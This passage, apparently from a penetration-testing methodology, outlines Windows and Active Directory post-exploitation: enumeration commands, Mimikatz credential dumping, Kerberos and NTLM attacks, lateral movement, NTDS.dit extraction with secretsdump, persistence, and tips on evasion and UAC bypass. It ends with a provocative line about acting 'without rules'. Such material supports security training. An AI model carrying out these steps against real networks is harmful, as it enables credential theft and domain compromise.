arp -aActive connections:
netstat -anoPowerShell:
Get-NetIPConfiguration
Get-NetTCPConnectionThings to identify:
- OS version and patch level
- Internal network structure
- Active connections
5.4 Processes, Services & Scheduled Tasks
Misconfigured services are a common escalation vector.
Tools Used
- Built-in commands
- PowerShell
List processes:
tasklist /svcList services:
sc queryPowerShell:
Get-Process
Get-ServiceScheduled tasks:
schtasks /query /fo LIST /vThings to identify:
- Services running as SYSTEM
- Writable services
- Weak scheduled tasks
5.5 Firewall, Shares & Policies Enumeration
Misconfigurations here can expose sensitive data.
Tools Used
- netsh
- net commands
Firewall rules:
netsh advfirewall show allprofiles
netsh advfirewall firewall show rule name=allShares:
net share
net viewGroup policies:
gpresult /zThings to identify:
- Open shares
- Weak firewall rules
- Policy misconfigurations
5.6 Credential Dumping & Token Abuse
Once elevated privileges are obtained, extract credentials.
Tools Used
- Mimikatz
- Meterpreter (kiwi)
- Incognito
Example:
privilege::debug
sekurlsa::logonpasswordsThings to extract:
- Plaintext passwords
- NTLM hashes
- Kerberos tickets
These enable:
- Lateral movement
- Privilege escalation
5.7 Local Privilege Escalation
Escalation can occur due to:
- Misconfigurations
- Weak permissions
- Known exploits
Techniques Used
- Token manipulation
- Service abuse
- Exploit execution
Check privileges:
whoami /privLook for:
- SeImpersonatePrivilege
- SeDebugPrivilege
Common vectors:
- Unquoted service paths
- Writable services
- Token impersonation (Potato attacks)
5.8 Active Directory Enumeration
If the system is domain-joined, move to domain-level enumeration.
Tools Used
- BloodHound
- PowerView
- AD Module
- CrackMapExec
Enumerate domain:
Get-Domain
Get-DomainSIDUsers and groups:
Get-DomainUser
Get-DomainGroupNetwork enumeration:
cme smb 192.168.1.0/24Things to identify:
- Domain controllers
- Admin users
- Service accounts
- Trust relationships
5.9 Credential Attacks (Kerberos & NTLM)
Active Directory heavily relies on credentials, making them a primary attack vector.
Techniques Used
- Kerberoasting
- ASREPRoasting
- Password spraying
- Pass-the-Hash
Targets:
- Service accounts
- Weak user credentials
Goal:
- Extract credentials for escalation
5.10 Lateral Movement
Using obtained credentials, move across systems.
Techniques Used
- Pass-the-Hash
- Pass-the-Ticket
- Remote execution
Targets:
- Domain controllers
- Admin machines
- File servers
Goal:
- Expand access within the network
5.11 Privilege Escalation to Domain Admin
The ultimate objective in AD environments is:
👉Domain Admin access
Common paths:
- Misconfigured ACLs
- Delegation abuse
- Weak service accounts
Examples:
- Unconstrained delegation
- DNSAdmins abuse
5.12 NTDS Extraction & Domain Compromise
Once high privileges are achieved, extract domain credentials.
Tools Used
- Mimikatz
- Impacket (secretsdump)
Example:
secretsdump.py domain/user:password@dc-ipThis provides:
- Full domain password database (NTDS.dit)
This stage equals complete domain compromise
5.13 Persistence in Active Directory
Attackers maintain long-term access using persistence mechanisms.
Techniques Used
- Golden Ticket
- Silver Ticket
- Backdoor accounts
- Registry persistence
Goal:
- Maintain access after detection
5.14 Data Exfiltration & Impact
Final stage focuses on demonstrating impact.
Activities:
- Extract sensitive data
- Access critical systems
- Demonstrate control over infrastructure
WHAT WE HAVE TILL NOW
At this stage, we have:
Full Windows host enumeration
Local privilege escalation (SYSTEM/admin access)
Credential dumping (passwords, hashes, tickets)
Domain enumeration (users, groups, controllers)
Credential attacks (Kerberos & NTLM abuse)
Lateral movement across internal systems
Privilege escalation to Domain Admin
NTDS.dit extraction (full credential database)
Persistence mechanisms established
Full Active Directory compromise (domain dominance)some tip:
In addition to the core post-exploitation workflow, several advanced operational considerations further enhance effectiveness and realism. Routing awareness should be incorporated by analyzing network paths using commands like
route print, which helps identify pivoting opportunities across internal subnets. During active sessions, especially when using frameworks like Meterpreter, built-in commands such assysinfo,getuid,getprivs, andipconfigprovide quick situational awareness and should be leveraged alongside automated post-exploitation modules (e.g., privilege enumeration, logged-on users, patch enumeration, and AV detection) to accelerate intelligence gathering. In scenarios where administrative privileges are present but restricted by User Account Control (UAC), bypass techniques should be considered to fully elevate execution context. Persistence mechanisms should also be evaluated and demonstrated where permitted, including creating users, modifying group memberships, scheduling tasks, or leveraging registry run keys, ensuring continued access without re-exploitation. To maintain stealth and evade detection, Living Off The Land techniques (LOLBins) should be utilized, relying on trusted native binaries such as PowerShell, certutil, and mshta instead of dropping external payloads. Defensive awareness is equally important, requiring enumeration of antivirus and endpoint protection configurations before executing payloads. Additionally, known high-impact vulnerabilities such as PrintNightmare, BlueKeep, or token impersonation exploits (particularly when privileges like SeImpersonatePrivilege are available) should be actively evaluated as part of privilege escalation strategy. Monitoring active sessions using commands likenet sessioncan reveal lateral movement opportunities, while compromised hosts should be used to scan internal networks and expand the attack surface. These considerations ensure that post-exploitation is not treated as a static checklist, but as a dynamic process driven by environment context, attacker adaptability, and real-world tradecraft.
If you got this far, imagine what someone without rules would do.